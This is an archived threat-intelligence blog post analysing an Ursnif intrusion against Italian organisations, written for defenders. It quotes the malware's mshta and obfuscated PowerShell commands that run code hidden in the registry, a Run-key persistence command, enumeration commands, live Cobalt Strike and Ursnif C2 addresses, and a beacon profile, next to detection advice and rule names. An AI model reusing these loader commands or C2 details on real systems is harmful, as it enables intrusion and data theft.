{
	"id": "2f39f1b5-475a-4167-b797-79e44410fd60",
	"created_at": "2026-04-06T01:28:56.450607Z",
	"updated_at": "2026-04-10T13:12:44.847025Z",
	"deleted_at": null,
	"sha1_hash": "f821315582d4be03690411b82ef3d23e95b7bf21",
	"title": "Ursnif VS Italy: Il PDF del Destino",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1423012,
	"plain_text": "Ursnif VS Italy: Il PDF del Destino\r\nBy Kostas\r\nPublished: 2023-07-31 · Archived: 2026-04-06 00:07:26 UTC\r\n9 min read\r\nJul 18, 2023\r\nThis is the second blog of this series which displays the actions that threat actors are taking upon post-exploitation\r\nefforts. Just a reminder, these short blog posts come with sanitized artifacts of the intrusion I observed. This is so\r\npeople can use it for training materials or recreate the investigation steps I followed in their own lab. You can find\r\nthe artifacts in the repo below.\r\nIntrusion_data: https://github.com/tsale/Intrusion_data\r\nSummary\r\nIn the first week of July, I observed post-exploitation activity from an Ursnif malware initial infection. Post-exploitation activities were very rapid, with threat actors enabling the VNC feature of the malware to interact with\r\nthe infected host. Through VNC’s graphical interface, they quickly searched for important documents on mapped\r\nshare drives. They later used the command prompt to run enumeration commands before using process injection\r\nto spawn a Cobalt Strike beacon.\r\nSeveral hours after the initial infection, the Cobalt Strike beacon came to life and threat actors started enumerating\r\nthe environment. They used their existing beacon session and attempted to elevate their access using a zerologon\r\nexploit. After about 10 hours, I witnessed them spawning a new Cobalt Strike beacon using a PowerShell loader.\r\nThis second beacon communicated with a different C2 IP. This was the last activity I observed through my\r\nanalysis, it is possible that the threat actors left the infected environment or that the gap of inactivity allowed for\r\nresponse and remediation of the infected host.\r\nFurther Intelligence Gathering\r\nDuring the ursnif VNC sessions, I was able to extract interesting data from the unencrypted network\r\ncommunication. Specifically, I managed to obtain the threat actors’ clipboard as well as screenshots. This\r\ninformation provides valuable insight into the attackers’ tactics, techniques, and procedures (TTPs). It allows us to\r\nsee the attack from their eyes. Their respective sections below will cover the relevant details regarding the\r\nintrusion.\r\nhttps://kostas-ts.medium.com/ursnif-vs-italy-il-pdf-del-destino-5c83d6281072\r\nPage 1 of 12\n\nThe Hands-On-Keyboard (HOK) activity began 30 minutes after the initial execution of the Ursnif malware. This\r\nemphasizes the importance of promptly addressing initial access broker malware. During the intrusion, it seemed\r\nlike the infected host was shared among multiple groups. This is due to the long periods of inactivity observed, the\r\ndifferent C2 channels as well as the repetitive enumeration commands on every newly established connection to a\r\ndifferent C2 infrastracture. Trustworthy threat intelligence sources reveal how criminals divide responsibilities\r\nduring an intrusion after the initial infection.\r\nEstablishing initial access themselves is no longer really required for threat actors, there’s a good\r\nchance someone else has already done it and is happy to sell it on. ~ source by @BushidoToken\r\nIt is also possible for different threat actors to often specialize in different aspects of an attack. In this case, the job\r\nof threat actors that responded to the initial infection could have been to profile the victim host and organization.\r\nThere was no activity from the beacon loaded in memory for five hours after the initial infection.\r\nPress enter or click to view image in full size\r\nDue to the sensitivity of the enclosed data, the VNC communication was not included in the network\r\ntraffic artifacts. However, information on how to extract this data as well as sanitized screenshots will\r\nbe shared down below.\r\nInitial Access\r\nThe phishing campaign that resulted in this intrusion targeted Italian organizations. The phishing email contained\r\na PDF attachment that started the malicious execution chain, as reported by @JAMESWT_MHT in this thread.\r\nPress enter or click to view image in full size\r\nhttps://kostas-ts.medium.com/ursnif-vs-italy-il-pdf-del-destino-5c83d6281072\r\nPage 2 of 12\n\nThis blog will focus on the malicious Ursnif DLL loader and the post-exploitation activity after the malware was\r\ninstalled on the infected host.\r\nExecution\r\nAfter the Ursnif DLL was loaded in memory, a series of automated activities took place in a very short timeframe.\r\nHere’s a visualization of the execution flow:\r\nPress enter or click to view image in full size\r\nhttps://kostas-ts.medium.com/ursnif-vs-italy-il-pdf-del-destino-5c83d6281072\r\nPage 3 of 12\n\nThe malware used mshta.exe to run an encoded script from Registry Key via the Explorer.exe parent process as\r\npart of the initial automated tasks.\r\nC:\\Windows\\System32\\mshta.exe” “about:\u003chta:application\u003e\r\n\u003cscript\u003eVsde=’wscript.shell’;resizeTo(0,2);eval(new\r\nActiveXObject(Vsde).regread(‘HKCU\\\\\\Software\\\\AppDataLow\\\\Software\\\\Microsoft\\\\98A2C439–17C5–8A1F-614C-3B5E25409F72\\\\\\ToolAbout’));if(!window.flag)close()\u003c/script\u003e\r\nHere is a breakdown of the script:\r\n‘about:’: This starting element creates an executable HTML Application loaded as a data URL.\r\n‘\u003chta:application\u003e\u003cscript\u003eVsde=’wscript.shell’:’ creates a Windows scripting host shell object.\r\n‘resizeTo(0,2);’: makes the application basically invisible.\r\n‘eval(new\r\nActiveXObject(Vsde).regread(‘HKCU\\\\\\\\Software\\\\AppDataLow\\\\Software\\\\Microsoft\\\\98A2C439–\r\n17C5–8A1F-614C-3B5E25409F72\\\\ToolAbout’));’: This accesses and reads the registry key specified,\r\nand then evaluates/runs the code found within it.\r\n‘if(!window.flag)close()’: closes the script if a specific flag is not found.\r\nThe code within the registry was a PowerShell command designed to execute scripts concealed within the\r\nspecified registry key, all while using built-in aliases to obscure the exact function being run.\r\nThe PowerShell command:\r\nhttps://kostas-ts.medium.com/ursnif-vs-italy-il-pdf-del-destino-5c83d6281072\r\nPage 4 of 12\n\npowershell.exe” new-alias -name ricvpy -value gp; new-alias -name xhpsqr -value iex; xhpsqr\r\n([System.Text.Encoding]::ASCII.GetString((ricvpy\r\n“HKCU:Software\\AppDataLow\\Software\\Microsoft\\98A2C439–17C5–8A1F-614C-3B5E25409F72”).MarkTime))\r\nFor a detailed explanation of the Ursnif execution flow, please see the relevant report that we (The DFIR Report\r\nteam) released back in January: Unwrapping Ursnifs Gifts. The TTPs are identical.\r\n💡 Detection Opportunity\r\nWe can detect and hunt for process execution events that are using command line interpreters such as\r\nmshta.exe or powershell.exe to read, decode and execute strings from the registry. (see Sigma rule on\r\nthe IOC section at the end of the blog)\r\nPersistence\r\nUrsnif created a persistence through the registry run keys by adding an LNK file pointing to the PowerShell\r\nexecutable and including parameters to execute a PowerShell script saved on disk.\r\nAll registry key names and malicious artifacts are randomized with each execution by the malware.\r\nGet Kostas’s stories in your inbox\r\nJoin Medium for free to get updates from this writer.\r\nRemember me for faster sign in\r\n\\REGISTRY\\USER\\\u003cSID\u003e\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ProcessFolder\r\ncmd.exe /c start C:\\\\Users\\\\\u003cuser\u003e\\\\ ProcessFolder.lnk -ep unrestricted -file C:\\\\Users\\\\\r\n\u003cuser\u003e\\\\ToolAbout.ps1\"\r\n💡 Detection Opportunity\r\nIdentify any Windows registry Run and RunOnce keys That contain parameters to facilitate the\r\nexecution of scripts under the C:\\Users directory. Depending on the environment, you may need to\r\ncreate a baseline of scripts that are scheduled to run on startup and exclude them.\r\nDefense Evasion\r\nThroughout the intrusion, there have been many occasions where the malware used process injection. Ursnif used\r\nremote process injection to execute a beacon by spawning a thread under conhost.exe.\r\nPress enter or click to view image in full size\r\nhttps://kostas-ts.medium.com/ursnif-vs-italy-il-pdf-del-destino-5c83d6281072\r\nPage 5 of 12\n\nIn a different example, Ursnif injected into explorer.exe to perform multiple functions.\r\nPress enter or click to view image in full size\r\n💡 Detection Opportunity\r\nA beacon running under the conhost.exe process was reaching out to malicious infrastructure. This is\r\nsuspicious behaviour, as conhost.exe should not be making external connections, especially at high\r\nintervals. We can use this as an example case to detect any unexpected Windows binary connections to\r\nhosts outside of our network.\r\nDiscovery\r\nAfter the initial infection, Ursnif executed the following automated commands on the infected host. The\r\ncommand’s output was saved as “.bin1” files in C:\\Users\\\u003cuser\u003e\\Appdata\\Local\\Temp.\r\ncmd /C “wmic computersystem get domain |more \u003e C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\4FCE.bin1”\r\ncmd /C “echo — — — →\u003e C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\4FCE.bin1”\r\ncmd /C “systeminfo.exe \u003e C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\4FCE.bin1”\r\ncmd /C “net view \u003e\u003e C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\4FCE.bin1”\r\ncmd /C “nslookup 127.0.0.1 \u003e\u003e C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\4FCE.bin1”\r\ncmd /C “tasklist.exe /SVC \u003e\u003e C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\4FCE.bin1”\r\ncmd /C “driverquery.exe \u003e\u003e C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\4FCE.bin1”\r\ncmd /C “reg.exe query “HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall” /s \u003e\u003e C:\\Users\\\u003cuse\r\ncmd /C “nltest /domain_trusts \u003e\u003e C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\4FCE.bin1”\r\ncmd /C “nltest /domain_trusts /all_trusts \u003e\u003e C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\4FCE.bin1”\r\ncmd /C “net view /all /domain \u003e\u003e C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\4FCE.bin1”\r\ncmd /C “net config workstation \u003e\u003e C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\4FCE.bin1”\r\ncmd /C “net view /all \u003e\u003e C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\4FCE.bin1”\r\ncmd /U /C “type C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\4FCE.bin1 \u003e C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\4FC\r\ncmd /C “net use \u003e\u003e C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\F7A7.bin1”\r\ncmd /C “echo — — — →\u003e C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\F7A7.bin1”\r\ncmd /U /C “type C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\F7A7.bin1 \u003e C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\F7A\r\nAfter executing the enumeration commands, the malware exfiltrated and deleted the files with the .bin extension.\r\nFurthermore, I observed many enumeration commands via the Hands-On-Keyboard (HOK) activities. Below are\r\nthe enumeration commands in question.\r\nhttps://kostas-ts.medium.com/ursnif-vs-italy-il-pdf-del-destino-5c83d6281072\r\nPage 6 of 12\n\ncmd.exe /C whoami/all\r\ncmd.exe /C net group “Domain Admins” /Domain\r\ncmd.exe /C systeminfo\r\ncmd.exe /C nltest /dclist: domain.local\r\ncmd.exe /C nltest /domain_trusts\r\ncmd.exe /C ipconfig /all\r\ncmd.exe /C whoami /all\r\ncmd.exe /C ping \u003cDomainController\u003e.domain.local\r\ncmd.exe /k whoami /groups\r\ncmd.exe /k net use\r\ncmd.exe /k arp -a\r\ncmd.exe /k tasklist\r\ncmd.exe /k ping 8.8.8.8\r\n💡 Detection Opportunity\r\nWe can detect the many auto-discovery commands that run in a small time frame, usually within 1\r\nminute from start to finish. Most initial access broker malware runs similar discovery commands in a\r\nshort time span. This detection technique can help identify other malware or suspicious activity in our\r\nnetwork.\r\nPress enter or click to view image in full size\r\nCommand and Control\r\nCommon control communication was established initially through Ursnif malware and later on via Cobalt strike\r\nbeacons. Please see below the atomic indicators related to the C2 infrastructure.\r\nUrsnif VNC\r\nThanks to @0xThiebaut’s tool PCAPeek, I was able to reconstruct some of the VNC traffic. More specifically, I\r\nwas able to collect a threat actor’s clipboard data and collect some valuable insights into their operations.\r\nUse of LightShot capturing tool\r\nThe threat actors behind Ursnif appeared to make users of LightShot, the screen-capturing tool. Throughout their\r\nhttps://kostas-ts.medium.com/ursnif-vs-italy-il-pdf-del-destino-5c83d6281072\r\nPage 7 of 12\n\nHOK activity, I found many links in their clipboard that pointed to an uploaded screenshot to https://prnt.sc. The\r\nscreenshots showed different details about the infected host, such as its network shares.\r\nMisc Interesting Clipboard Data\r\nAlong with multiple copy-paste commands, there were the servers that hosted the admin panel they used for this\r\ncampaign. The URL paths and parameters found as part of the clipboard data indicated sensitive server resources\r\nrelated to the malware campaign.\r\nIn the interest of information gathering and ongoing threat intelligence efforts, I will not make any of the\r\ninformation related to the admin panel public. The information is shared with trusted groups of the infosec\r\ncommunity.\r\nVisuals\r\nBelow, you can see sanitized visuals of the threat actor’s HOK activity recovered using PCAPeek.\r\nPress enter or click to view image in full size\r\nPress enter or click to view image in full size\r\nPress enter or click to view image in full size\r\nhttps://kostas-ts.medium.com/ursnif-vs-italy-il-pdf-del-destino-5c83d6281072\r\nPage 8 of 12\n\nIOC/IOA\r\nCobalt Strike C2\r\n173.44.141.237:80\r\n170.130.165.159:80\r\n173.44.141.199:80\r\n152.89.198.29:80\r\n173–44–141–47.nip.io\r\nUrsnif C2\r\nhttp://avas1t.de/in/loginq/...\r\nhttp://109.105.198.129/pictures/…\r\n185.82.127.183:80\r\nhttp://31.172.83.49/pictures/…\r\n91.201.65.64:9955 (VNC)\r\n91.201.65.64:9989 (VNC)\r\nhttp://delideta.com/pictures/... (IP = 91.212.166.44)\r\nhttp://itwicenice.com/pictures/... (IP = 91.212.166.44)\r\nCobalt Strike Profile\r\nBeaconType: HTTP\r\nPort: 80\r\nSleepTime: 45000\r\nMaxGetSize: 2801745\r\nJitter: 37\r\nPublicKey_MD5: a37589ce24a7082ed1c6728b50d73d02\r\nC2Server: 173.44.141.237,/jquery-3.3.1.min.js\r\nUserAgent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko\r\nHttpPostUri: /jquery-3.3.2.min.js\r\nMalleable_C2_Instructions: Remove 1522 bytes from the end\r\n Remove 84 bytes from the beginning\r\n Remove 3931 bytes from the beginning\r\nhttps://kostas-ts.medium.com/ursnif-vs-italy-il-pdf-del-destino-5c83d6281072\r\nPage 9 of 12\n\nBase64 URL-safe decode\r\n XOR mask w/ random key\r\nHttpGet_Metadata: ConstHeaders\r\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n Referer: http://code.jquery.com/\r\n Accept-Encoding: gzip, deflate\r\n Metadata\r\n base64url\r\n prepend “__cfduid=”\r\n header “Cookie”\r\nHttpPost_Metadata: ConstHeaders\r\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n Referer: http://code.jquery.com/\r\n Accept-Encoding: gzip, deflate\r\n SessionId\r\n mask\r\n base64url\r\n parameter “__cfduid”\r\n Output\r\n mask\r\n base64url\r\n print\r\nHttpGet_Verb: GET\r\nHttpPost_Verb: POST\r\nSpawnto_x86: %windir%\\syswow64\\dllhost.exe\r\nSpawnto_x64: %windir%\\sysnative\\dllhost.exe\r\nProxy_Behavior: Use IE settings\r\nWatermark_Hash: bfnETSwzb1Xsa2g6gr+auA==\r\nWatermark: 674054486\r\nbStageCleanup: True\r\nbCFGCaution: False\r\nKillDate: 0\r\nbProcInject_StartRWX: False\r\nbProcInject_UseRWX: False\r\nbProcInject_MinAllocSize: 17500\r\nProcInject_PrependAppend_x86: b’\\x90\\x90'\r\n Empty\r\nProcInject_PrependAppend_x64: b’\\x90\\x90'\r\n Empty\r\nProcInject_Execute: ntdll:RtlUserThreadStart\r\n CreateThread\r\n NtQueueApcThread-s\r\n CreateRemoteThread\r\n RtlCreateUserThread\r\nProcInject_AllocationMethod: NtMapViewOfSection\r\nhttps://kostas-ts.medium.com/ursnif-vs-italy-il-pdf-del-destino-5c83d6281072\r\nPage 10 of 12\n\nSuricata Rules\r\nET MALWARE Ursnif Variant CnC Data Exfil\r\nET MALWARE Ursnif Variant CnC Beacon 3\r\nET MALWARE Ursnif Variant CnC Beacon — URI Struct M1 (_2B)\r\nET MALWARE Ursnif Variant CnC Beacon — URI Struct M2 (_2F)\r\nET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1\r\nET EXPLOIT Possible Zerologon Phase 1/3 — NetrServerReqChallenge with 0x00 Client Challenge (CVE-2020–1472)\r\nET USER_AGENTS WinRM User Agent Detected — Possible Lateral Movement\r\nET MALWARE Windows Microsoft Windows DOS prompt command Error not recognized\r\nET MALWARE Windows dir Microsoft Windows DOS prompt command exit OUTBOUND\r\nET MALWARE Windows TaskList Microsoft Windows DOS prompt command exit OUTBOUND\r\nET MALWARE Windows arp -a Microsoft Windows DOS prompt command exit OUTBOUND\r\nET INFO Dotted Quad Host RAR Request\r\nET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2\r\nET MALWARE Cobalt Strike Activity (POST)\r\nET MALWARE Cobalt Strike Beacon Activity (GET)\r\nSigma Rules\r\nCustom\r\nUrsnif Discovery Commands Redirection\r\nExplorer UAC Bypass via NOUACCHECK\r\nSigma Repo\r\nSuspicious Csc.exe Source File Folder\r\nUsage Of Web Request Commands And Cmdlets\r\nExplorer NOUACCHECK Flag\r\nShare And Session Enumeration Using Net.EXE\r\nNon Interactive PowerShell Process Spawned\r\nSuspicious PowerShell Parameter Substring\r\nPowerShell Download Pattern\r\nWhoami Utility Execution\r\nUrsnif Loader\r\nMshta Executing from Registry\r\nArtifacts\r\nb565aa423ca4ba6e8c6b208c22e5b056.dll —\r\n894668791d06262dd16740235faa3b1672e2cb5cf171954f29abaca421c09265\r\nToolAbout.ps1–6e8b848e7e28a1fd474bf825330bbd4c054346ad1698c68e7a59dd38232a940a\r\nhttps://kostas-ts.medium.com/ursnif-vs-italy-il-pdf-del-destino-5c83d6281072\r\nPage 11 of 12\n\nbeacon.bin — 1324e7654a144c20637820a022d49c449cca1ff1d2c7e040bf23421d52146e93\r\nThank You Notes\r\nA special thanks to @JAMESWT_MHT and @reecdeep for continuously sharing information related to the latest\r\ncampaigns. You make the world a safer place 🙏\r\nReferences\r\nhttps://www.sentinelone.com/blog/more-evil-markets-how-its-never-been-easier-to-buy-initial-access-to-compromised-networks/\r\nhttps://blog.bushidotoken.net/2022/03/one-way-or-another-initial-access.html\r\nhttps://blog.bushidotoken.net/2021/09/how-do-you-run-cybercrime-gang.html\r\nSource: https://kostas-ts.medium.com/ursnif-vs-italy-il-pdf-del-destino-5c83d6281072\r\nhttps://kostas-ts.medium.com/ursnif-vs-italy-il-pdf-del-destino-5c83d6281072\r\nPage 12 of 12",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://kostas-ts.medium.com/ursnif-vs-italy-il-pdf-del-destino-5c83d6281072"
	],
	"report_names": [
		"ursnif-vs-italy-il-pdf-del-destino-5c83d6281072"
	],
	"threat_actors": [
		{
			"id": "08c8f238-1df5-4e75-b4d8-276ebead502d",
			"created_at": "2023-01-06T13:46:39.344081Z",
			"updated_at": "2026-04-10T02:00:03.294222Z",
			"deleted_at": null,
			"main_name": "Copy-Paste",
			"aliases": [],
			"source_name": "MISPGALAXY:Copy-Paste",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775438936,
	"ts_updated_at": 1775826764,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f821315582d4be03690411b82ef3d23e95b7bf21.pdf",
		"text": "https://archive.orkl.eu/f821315582d4be03690411b82ef3d23e95b7bf21.txt",
		"img": "https://archive.orkl.eu/f821315582d4be03690411b82ef3d23e95b7bf21.jpg"
	}
}